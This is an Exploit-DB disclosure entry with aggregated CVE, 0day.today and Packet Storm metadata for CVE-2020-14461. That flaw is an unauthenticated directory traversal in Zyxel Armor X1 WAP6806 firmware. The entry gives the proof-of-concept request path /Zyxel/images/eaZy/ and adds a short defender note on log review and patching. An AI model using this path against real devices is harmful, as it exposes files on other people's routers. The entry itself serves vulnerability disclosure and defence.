ID EDB-ID:48669
Type exploitdb
Reporter Exploit-DB
Modified 2020-07-15T00:00:00
Description
# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal
# Date: 2020-06-19
# Exploit Author: Rajivarnan R
# Vendor Homepage: https://www.zyxel.com/
# Software [http://www.zyxelguard.com/WAP6806.asp]
# Version: [V1.00(ABAL.6)C0]
# CVE: 2020-14461
# Tested on: Linux Mint / Windows 10
# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]
# As a result of the research, one vulnerability was identified
# (Directory Traversal).
# Technical information is provided below step by step.
# [1] - Directory Traversal Vulnerability
# Vulnerable Parameter Type: GET
# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/ (the request URI path, not a query parameter)
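# Proof of Concept: https://TARGET/Zyxel/images/eaZy/
<https://target/Zyxel/images/eaZy/>
# Defender note: the CVSS vectors recorded for CVE-2020-14461 rate this as requiring no authentication (Au:N / PR:N), so GET requests for /Zyxel/images/eaZy/ in web or proxy logs are worth reviewing; keep the device's web interface reachable only from trusted networks and check the vendor for firmware newer than V1.00(ABAL.6)C0.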
{"id": "EDB-ID:48669", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Zyxel Armor X1 WAP6806 - Directory Traversal", "description": "", "published": "2020-07-15T00:00:00", "modified": "2020-07-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://www.exploit-db.com/exploits/48669", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2020-14461"], "lastseen": "2020-07-15T14:29:26", "viewCount": 341, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-14461"]}, {"type": "zdt", "idList": ["1337DAY-ID-34686"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158428"]}], "modified": "2020-07-15T14:29:26", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2020-07-15T14:29:26", "rev": 2}, "vulnersScore": 5.8}, "sourceHref": "https://www.exploit-db.com/download/48669", "sourceData": "# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal\r\n# Date: 2020-06-19\r\n# Exploit Author: Rajivarnan R\r\n# Vendor Homepage: https://www.zyxel.com/\r\n# Software [http://www.zyxelguard.com/WAP6806.asp]\r\n# Version: [V1.00(ABAL.6)C0]\r\n# CVE: 2020-14461\r\n# Tested on: Linux Mint / Windows 10\r\n# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]\r\n\r\n# As a result of the research, one vulnerability identified. \r\n# (Directory Traversal)\r\n# Technical information is provided below step by step.\r\n\r\n# [1] - Directory Traversal Vulnerability\r\n\r\n# Vulnerable Parameter Type: GET\r\n# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/]\r\n\r\n# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/\r\n<https://target/Zyxel/images/eaZy/>", "osvdbidlist": []}
{"cve": [{"lastseen": "2020-10-03T12:55:50", "description": "Zyxel Armor X1 WAP6806 1.00(ABAL.6)C0 devices allow Directory Traversal via the images/eaZy/ URI.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 8.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 4.0}, "published": "2020-06-22T13:15:00", "title": "CVE-2020-14461", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14461"], "modified": "2020-07-15T17:15:00", "cpe": ["cpe:/o:zyxel:wap6806_firmware:1.00\\(abal.6\\)c0"], "id": "CVE-2020-14461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14461", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:zyxel:wap6806_firmware:1.00\\(abal.6\\)c0:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2020-07-19T17:58:48", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2020-07-15T00:00:00", "title": "Zyxel Armor X1 WAP6806 - Directory Traversal Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-14461"], "modified": "2020-07-15T00:00:00", "id": "1337DAY-ID-34686", "href": 
"https://0day.today/exploit/description/34686", "sourceData": "# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal\r\n# Exploit Author: Rajivarnan R\r\n# Vendor Homepage: https://www.zyxel.com/\r\n# Software [http://www.zyxelguard.com/WAP6806.asp]\r\n# Version: [V1.00(ABAL.6)C0]\r\n# CVE: 2020-14461\r\n# Tested on: Linux Mint / Windows 10\r\n# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]\r\n\r\n# As a result of the research, one vulnerability identified. \r\n# (Directory Traversal)\r\n# Technical information is provided below step by step.\r\n\r\n# [1] - Directory Traversal Vulnerability\r\n\r\n# Vulnerable Parameter Type: GET\r\n# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/]\r\n\r\n# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/\r\n<https://target/Zyxel/images/eaZy/>\n\n# 0day.today [2020-07-19] #", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://0day.today/exploit/34686"}], "packetstorm": [{"lastseen": "2020-07-16T09:48:55", "description": "", "published": "2020-07-15T00:00:00", "type": "packetstorm", "title": "Zyxel Armor X1 WAP6806 Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-14461"], "modified": "2020-07-15T00:00:00", "id": "PACKETSTORM:158428", "href": "https://packetstormsecurity.com/files/158428/Zyxel-Armor-X1-WAP6806-Directory-Traversal.html", "sourceData": "`# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal \n# Date: 2020-06-19 \n# Exploit Author: Rajivarnan R \n# Vendor Homepage: https://www.zyxel.com/ \n# Software [http://www.zyxelguard.com/WAP6806.asp] \n# Version: [V1.00(ABAL.6)C0] \n# CVE: 2020-14461 \n# Tested on: Linux Mint / Windows 10 \n# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD] \n \n# As a result of the research, one vulnerability identified. \n# (Directory Traversal) \n# Technical information is provided below step by step. 
\n \n# [1] - Directory Traversal Vulnerability \n \n# Vulnerable Parameter Type: GET \n# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/] \n \n# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/ \n<https://target/Zyxel/images/eaZy/> \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/158428/zyxelarmorx1-traversal.txt"}]}